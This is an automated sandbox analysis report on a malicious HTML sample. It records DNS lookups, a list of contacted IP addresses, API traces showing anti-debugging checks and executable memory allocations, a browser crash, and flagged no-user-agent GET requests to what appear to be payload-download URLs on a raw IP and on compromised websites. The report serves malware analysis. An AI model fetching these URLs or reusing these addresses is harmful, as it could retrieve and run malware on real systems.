popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ve.html

Generic Malware Malicious Library Antivirus UPX Malicious Packer AntiDebug MSOffice File DLL OS Processor Check PE32 PE File AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Jan. 19, 2022, 11:31 a.m. Jan. 19, 2022, 11:35 a.m.
Size 10.8KB
Type data
MD5 5c2e8fbd656903baac1dbcf81ac19e78
SHA256 483adcd805a7367b64712904038c4522fddbcba50bce3b4d5ae41b2e6ceb818f
CRC32 F4A7DA81
ssdeep 192:aYhCkQTk/twdkXVYEc9haFXQP9drp7EFy7Zea2P5YPi7zeQN4+0MCZR7T0u45uV6:aYgk/5VYEc9hax09T4CZ/2hTkjMCZRsT
Yara None matched

Name Response Post-Analysis Lookup
ippur.ufrj.br
A 146.164.84.216
146.164.84.216
apps.identrust.com
A 121.254.136.27
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 121.254.136.57
23.43.165.66
atplengineering.com
A 148.66.159.242
148.66.159.242
soomaal.softuvo.xyz
A 112.196.72.188
112.196.72.188
www2.s12.xrea.com
A 150.95.8.112
150.95.8.112
scoute.ai
A 54.254.177.153
54.254.177.153
wordpress.pixeleyenow.com
A 210.3.48.214
210.3.48.214
sarvaero.com
A 95.111.224.35
95.111.224.35
IP Address Status Action
103.8.26.102 Active Moloch
103.8.26.103 Active Moloch
104.168.155.129 Active Moloch
112.196.72.188 Active Moloch
117.18.232.200 Active Moloch
121.254.136.27 Active Moloch
131.100.24.231 Active Moloch
146.164.84.216 Active Moloch
148.66.159.242 Active Moloch
150.95.8.112 Active Moloch
164.124.101.2 Active Moloch
178.63.25.185 Active Moloch
178.79.147.66 Active Moloch
185.7.214.7 Active Moloch
192.254.71.210 Active Moloch
203.114.109.124 Active Moloch
207.38.84.195 Active Moloch
209.59.138.75 Active Moloch
210.3.48.214 Active Moloch
212.237.17.99 Active Moloch
217.182.143.207 Active Moloch
45.118.115.99 Active Moloch
45.142.114.231 Active Moloch
45.176.232.124 Active Moloch
46.55.222.11 Active Moloch
51.38.71.0 Active Moloch
51.68.175.8 Active Moloch
54.254.177.153 Active Moloch
58.227.42.236 Active Moloch
79.172.212.216 Active Moloch
95.111.224.35 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: IsPublic IsSerial Name BaseType
console_handle: 0x000000000000001b
1 1 0

WriteConsoleW

 buffer: True False Process System.ComponentM...
console_handle: 0x0000000000000023
1 1 0

WriteConsoleW

 buffer: PS C:\Users\test22\Desktop>
console_handle: 0x0000000000000017
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c54f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306710
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306710
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3073c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3073c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3073c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c5560
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c5560
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c5560
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c5560
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b330870
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b330870
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd7da49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdaa73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefdc043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdac5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdac2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdb6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdb6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdac48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefdd30883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefdd30ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefdd30c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdbea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdbfd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefdd3347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefdd3122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefdd33542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdbfd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdbfd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769e9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769e98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdbfd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefdd23e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdbd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdbd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76da652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x770fc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd7da49d
registers.r14: 0
registers.r15: 0
registers.rcx: 98756672
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 98762624
registers.r11: 98758432
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1925372213
registers.r13: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.7.214.7/ve/ve.png
suspicious_features GET method with no useragent header suspicious_request GET http://ippur.ufrj.br/assets/W8jp7/
suspicious_features GET method with no useragent header suspicious_request GET http://sarvaero.com/assets/BRrGH0HSkc/
suspicious_features GET method with no useragent header suspicious_request GET http://atplengineering.com/wp-admin/mDk/
suspicious_features GET method with no useragent header suspicious_request GET http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/
request GET http://185.7.214.7/ve/ve.png
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://ippur.ufrj.br/assets/W8jp7/
request GET http://sarvaero.com/assets/BRrGH0HSkc/
request GET http://atplengineering.com/wp-admin/mDk/
request GET http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
ip 103.8.26.102
ip 103.8.26.103
ip 104.168.155.129
ip 209.59.138.75
ip 51.68.175.8
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2336
region_size: 3477504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002820000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2336
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ed000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a12000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a12000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc015000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc015000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff0d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefede1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769da000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2336
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002e30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef6e69000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2456
region_size: 2691072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002860000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2456
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ed000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a12000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a12000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc015000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc015000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff0d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefede1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769da000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769df000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769dd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769db000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076da6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077116000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076da1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769e0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769da000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000770ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000770fb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdd17000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff074000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff071000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff076000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 2336 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd7da49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdaa73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefdc043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdac5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdac2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdb6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdb6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdac48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefdd30883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefdd30ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefdd30c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdbea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdbfd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefdd3347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefdd3122b
